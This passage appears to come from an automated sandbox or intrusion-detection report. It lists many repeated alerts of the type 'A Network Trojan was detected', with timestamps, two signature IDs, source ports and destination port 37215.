              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508436
              SID:2829579
              Source Port:57266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949872
              SID:2835222
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197825
              SID:2829579
              Source Port:37606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784309
              SID:2829579
              Source Port:41268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631791
              SID:2835222
              Source Port:52364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127442
              SID:2835222
              Source Port:35098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415721
              SID:2835222
              Source Port:60456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831133
              SID:2835222
              Source Port:38524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696893
              SID:2835222
              Source Port:34928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246287
              SID:2829579
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527511
              SID:2835222
              Source Port:43490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824923
              SID:2835222
              Source Port:58584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100712
              SID:2829579
              Source Port:44304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307261
              SID:2835222
              Source Port:46278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929860
              SID:2829579
              Source Port:51734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014523
              SID:2835222
              Source Port:37594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300575
              SID:2829579
              Source Port:55838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256868
              SID:2829579
              Source Port:58514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711221
              SID:2835222
              Source Port:55566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707435
              SID:2829579
              Source Port:37308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028349
              SID:2829579
              Source Port:60976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276594
              SID:2835222
              Source Port:46548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086660
              SID:2829579
              Source Port:49956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172660
              SID:2835222
              Source Port:53984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135509
              SID:2835222
              Source Port:49210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415950
              SID:2829579
              Source Port:48894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248341
              SID:2835222
              Source Port:40500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821023
              SID:2835222
              Source Port:34898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300223
              SID:2835222
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789967
              SID:2829579
              Source Port:35200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488718
              SID:2835222
              Source Port:38362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302763
              SID:2829579
              Source Port:33888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158494
              SID:2835222
              Source Port:37260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439565
              SID:2829579
              Source Port:47370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971285
              SID:2829579
              Source Port:56310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230611
              SID:2829579
              Source Port:59864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729888
              SID:2829579
              Source Port:33530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573129
              SID:2829579
              Source Port:47820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.955000
              SID:2835222
              Source Port:34146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991316
              SID:2829579
              Source Port:42716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660457
              SID:2829579
              Source Port:37724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231662
              SID:2835222
              Source Port:39926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440872
              SID:2835222
              Source Port:56394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458744
              SID:2829579
              Source Port:53788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300443
              SID:2829579
              Source Port:52748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454468
              SID:2829579
              Source Port:43272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424038
              SID:2829579
              Source Port:49136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613615
              SID:2835222
              Source Port:37060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108959
              SID:2835222
              Source Port:33218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728346
              SID:2829579
              Source Port:60870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128553
              SID:2835222
              Source Port:42286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488076
              SID:2829579
              Source Port:59562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094255
              SID:2829579
              Source Port:58452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547328
              SID:2835222
              Source Port:42580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990162
              SID:2829579
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404493
              SID:2835222
              Source Port:41850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401983
              SID:2835222
              Source Port:60274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376711
              SID:2829579
              Source Port:49338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632218
              SID:2829579
              Source Port:33670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271835
              SID:2829579
              Source Port:50050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402804
              SID:2829579
              Source Port:37718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403988
              SID:2835222
              Source Port:55522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279772
              SID:2835222
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555944
              SID:2835222
              Source Port:36032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408953
              SID:2835222
              Source Port:35996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275504
              SID:2829579
              Source Port:52600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043269
              SID:2829579
              Source Port:44400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277127
              SID:2835222
              Source Port:59232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376391
              SID:2835222
              Source Port:39174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526312
              SID:2829579
              Source Port:49640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214066
              SID:2835222
              Source Port:57570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266476
              SID:2829579
              Source Port:33772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406898
              SID:2835222
              Source Port:37328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566280
              SID:2829579
              Source Port:43106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164860
              SID:2835222
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487044
              SID:2835222
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630852
              SID:2829579
              Source Port:50714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554750
              SID:2835222
              Source Port:43138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310565
              SID:2835222
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172810
              SID:2835222
              Source Port:46402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254756
              SID:2835222
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221283
              SID:2829579
              Source Port:54460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213534
              SID:2829579
              Source Port:36006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909036
              SID:2829579
              Source Port:37690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135703
              SID:2829579
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263803
              SID:2835222
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631928
              SID:2835222
              Source Port:34914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729510
              SID:2829579
              Source Port:37520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835778
              SID:2835222
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358180
              SID:2829579
              Source Port:38462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355710
              SID:2835222
              Source Port:38132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669401
              SID:2835222
              Source Port:39916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165773
              SID:2829579
              Source Port:40638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438750
              SID:2835222
              Source Port:41644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632464
              SID:2829579
              Source Port:43242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872464
              SID:2835222
              Source Port:56568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605041
              SID:2829579
              Source Port:36370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567508
              SID:2835222
              Source Port:46412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212948
              SID:2829579
              Source Port:41378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696214
              SID:2829579
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460196
              SID:2835222
              Source Port:53468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379186
              SID:2829579
              Source Port:36732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456779
              SID:2835222
              Source Port:56420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164437
              SID:2829579
              Source Port:51908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569777
              SID:2835222
              Source Port:49088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452640
              SID:2835222
              Source Port:46746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058633
              SID:2829579
              Source Port:35984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043366
              SID:2829579
              Source Port:45306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253542
              SID:2835222
              Source Port:58080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707355
              SID:2835222
              Source Port:34982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155811
              SID:2829579
              Source Port:56312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077850
              SID:2835222
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408377
              SID:2829579
              Source Port:50582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027511
              SID:2829579
              Source Port:36956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486037
              SID:2829579
              Source Port:43734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866241
              SID:2835222
              Source Port:49486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350608
              SID:2835222
              Source Port:59042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458400
              SID:2835222
              Source Port:50386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524689
              SID:2835222
              Source Port:59480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836690
              SID:2835222
              Source Port:49838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674587
              SID:2835222
              Source Port:54780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245158
              SID:2835222
              Source Port:37870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298258
              SID:2835222
              Source Port:54088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374225
              SID:2835222
              Source Port:55666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455078
              SID:2835222
              Source Port:45358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415465
              SID:2835222
              Source Port:48198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749280
              SID:2829579
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730934
              SID:2835222
              Source Port:46250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211540
              SID:2835222
              Source Port:34018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267241
              SID:2835222
              Source Port:51752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696299
              SID:2829579
              Source Port:51454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914051
              SID:2835222
              Source Port:51542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940881
              SID:2829579
              Source Port:49276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100910
              SID:2829579
              Source Port:43496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378674
              SID:2835222
              Source Port:60004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025154
              SID:2835222
              Source Port:35760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085589
              SID:2835222
              Source Port:46908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096062
              SID:2835222
              Source Port:43346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323170
              SID:2835222
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220890
              SID:2835222
              Source Port:32782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942808
              SID:2829579
              Source Port:47970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079616
              SID:2829579
              Source Port:37830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573634
              SID:2835222
              Source Port:46388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155169
              SID:2829579
              Source Port:41050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194830
              SID:2835222
              Source Port:54808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133391
              SID:2835222
              Source Port:47258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088316
              SID:2835222
              Source Port:33766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158384
              SID:2829579
              Source Port:55198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177263
              SID:2835222
              Source Port:48280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730825
              SID:2835222
              Source Port:54280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093175
              SID:2829579
              Source Port:49658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404333
              SID:2835222
              Source Port:39624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551659
              SID:2829579
              Source Port:35098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056888
              SID:2835222
              Source Port:54102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424674
              SID:2829579
              Source Port:54570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090869
              SID:2835222
              Source Port:51996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634555
              SID:2829579
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607324
              SID:2835222
              Source Port:54238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634436
              SID:2835222
              Source Port:60206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169272
              SID:2835222
              Source Port:47036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322596
              SID:2835222
              Source Port:36060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134430
              SID:2829579
              Source Port:39068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091429
              SID:2829579
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248532
              SID:2829579
              Source Port:49562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509839
              SID:2829579
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210726
              SID:2829579
              Source Port:60114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566369
              SID:2829579
              Source Port:60642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400652
              SID:2829579
              Source Port:51422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252238
              SID:2835222
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505485
              SID:2829579
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377977
              SID:2835222
              Source Port:44144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572882
              SID:2835222
              Source Port:37274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630340
              SID:2829579
              Source Port:47846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694181
              SID:2835222
              Source Port:35904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422865
              SID:2835222
              Source Port:47016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150849
              SID:2835222
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173929
              SID:2829579
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569995
              SID:2829579
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197767
              SID:2829579
              Source Port:59892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221638
              SID:2835222
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942318
              SID:2835222
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378115
              SID:2835222
              Source Port:39112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176366
              SID:2835222
              Source Port:50210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729758
              SID:2829579
              Source Port:40848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838858
              SID:2835222
              Source Port:32928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708154
              SID:2829579
              Source Port:59802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196703
              SID:2829579
              Source Port:37644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175803
              SID:2829579
              Source Port:43852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076626
              SID:2829579
              Source Port:39028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572494
              SID:2835222
              Source Port:59212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341227
              SID:2835222
              Source Port:57156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407964
              SID:2829579
              Source Port:43828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553558
              SID:2829579
              Source Port:46186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725647
              SID:2829579
              Source Port:47056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274692
              SID:2835222
              Source Port:51504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155562
              SID:2835222
              Source Port:41474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017361
              SID:2835222
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
